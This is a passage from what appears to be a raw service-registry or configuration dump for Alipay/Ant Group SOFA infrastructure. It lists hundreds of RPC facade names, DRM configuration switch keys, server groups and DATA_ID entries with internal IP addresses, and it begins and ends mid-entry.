AULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.PageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.verification.VerificationRecordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALMANALYSIS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundAccompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:yuemaprodOnCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.social.common.amap.component.AMapComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditmng_workProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.globalSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_BKMERCHANTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MRCHMEMBERCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kabaoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.operation.CommodityShopOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_${bp_engine_job_subscriber_topic}#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insassetprod.common.service.facade.PolicyRenewalManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.EventTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.manage.IndustryPoolConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.CategoryService:1.0:categoryService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.AppletTaskParticipateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpa.common.service.cashier.api.MpaCashierPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_G_SUPERGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.client.drm712#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.ioteds.schema.api.SchemaChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.merchantsettle.service.common.facade.factoring.BizAuthSettleCallback:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.csplatform.UserAwardOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.AdumpManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cnamlreport@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.credittrade.facade.service.api.fin.FinServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.event.EventManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_MOBILE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.diag.common.service.facade.EsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:memberprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.batchAuditHasSubject,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.riskmng.biz.drm.ScanRelieveResource2.scanIdentifyFreezeRelieveSwitchStr2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insofflineinvest.common.service.facade.service.ClockInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.level.SecurityLevelService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:sesameCredit_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_ST2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_192.168.3.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:mobilecmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:securitydata@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.OperationLogService:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.HoloxSampleItemService:1.0:holoxSampleKeywordService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.ZoneRuleDrm.globalDBSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbatch.comm.service.facade.callback.SchedulerNotifyService:1.0:fincompose@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.GlBasicInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.api.AccorderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepGlobalRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.aviatorFormat2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_gfmac_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.WithdrawAckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardConsultFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.mobileinfo.MobileInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.PublicAppTypeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.AbossOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.TagFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:excashier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zarkcenter.common.service.api.ConfigDataService:1.0:zarkService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:minicenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.ClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcupaprod.common.service.facade.api.AuthorizationRelationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.125.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_LIFE_ASSIST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.portal.common.service.facade.repeat.AssetsReplacementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:pcreditcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.cap.CapUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcalbmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskdatacenter.service.facade.quota.transfer.EmergencyQuotaTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpa.common.service.base.api.MpaStandardPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbalgocenter.common.service.facade.api.AlgoServiceNonUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.service.policy.PolicyDecisionManager:1.0:assetPolicyDecisionManager@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.DeployRecordQueryService:1.0:${dscc_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.prodTransSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mdeviceprodModify_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftReceiveAwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.giftpackage.SaleGiftPackageActivityManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:certify#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.237.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.volvo.biz.shared.caseworkflow.RunCaseEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.common.service.facade.channel.ChannelInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbillingcore.common.service.facade.BackstageRestServiceForCustomerService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloanapply.facade.loanapply.service.LoanApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.43.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmerchant.service.facade.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.insure.AutoAgentCarPortalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettleprod.facade.CustViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.SubProductRelationPropertyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.management.GrayCampaignManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.SimulateAgreementPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_APIRES#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.CheckBlockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:defininstchannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:holoxmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucrcenter.service.facade.api.ZmCreditScoreQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PCREDITMERCHANT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqdataservice.common.service.facade.spider.YqSearchOrCrawlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditmng.service.opcfg.ApprovalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.FinancialInstQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingBusinessMonitorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.210.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antrecluse.facade.service.sample.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.CityOneCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.mng.query.InfluxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.236.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechannel.senior.common.service.facade.touristcardprod.api.TouristCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-fixed-execute-unknown.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:etetestcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ManualOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.rest.BsbGenericConfigRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dqs.common.service.facade.ScriptFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.ShopReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.certificate.CertificateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntFinPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.CheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIJobCompensateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTFLUXDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:cscenterTaskCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:approveAbsAssetRiskTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.cifcommon.UserAgreementQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksupplychainprod_bpProcessFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.orgconfig.PcinstConfigRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudnet.facade.server.ServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ccr.RepayPeriodConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.227.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antcloud.dsrconsole.common.service.facade.GuardianRuleConfigFacade:1.0:mybankguardiandsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.userRenewalWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.basic.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.appxcore.common.service.facade.api.selection.SelectionMngQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mapi.facade.partner.PartnerSecurityQueryFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.core.service.task.AdTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.msg.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@publictest#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.lifemng.facade.bizrecon.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.algorithmtest.api.AnnaScriptRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.servicelibrary.ServiceLibraryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antdld@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.rpcAmbushRecordOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:alb_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mergepayprod.common.service.facade.biz.api.MergeBizPreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.servicegovern.common.service.facade.RouterRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.OutCardBizDRM.refundBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.content.FansContentPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.apopscompose.common.service.facade.processinstance.ProcessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdmc_common_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.oneshop.core.businessservice.api.SaveRecommendedShopApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.data.AlarmReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.core.service.ApportionCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antlogmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.DeviceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.MaterialQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.ContentLegalCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rule.common.base.service.ScriptValidateService:1.0:OPENINSIGHT@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.dback.api.DbackContractOutBizNoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.couponSensitiveDarwin,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.dback.api.DbackQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.finscenecore.api.SceneTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.voucherprod.facade.api.asset.VcpAssetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.recommend.report.LifeReportServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.relationship.ActivityRelationShipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.callback.MFundConsumeNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:otp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ZoneTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.datacontrol.facade.DataControlTaskRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundFixedManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquirePayVostroService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundInvestmentStyleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.51.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.testresaopserver.facade.MockServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finstore.common.service.facade.fxci.FICIRightsInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ClaimCommonDRMClient.supportCityStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.common.service.facade.management.KatongBankServiceQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmccore.creditservice.service.facade.CreditServiceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prizecore.common.service.facade.mng.TaoBaoUnifyRightsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sci.scimng.facade.service.SciMngOpenApiFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.irisk.IntlVelocityStrategyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.experiment.ExperimentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditmerchant.service.facade.HBMerchantFeeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.partner.repository.FmpWithdrawConfigRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\">@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.o2o.facade.OperatorShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.management.hyp.SyncServInfoForHYPFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rulescaner@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.exclusivesales.api.ESPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_DBACKAPPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.monthProdTransGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.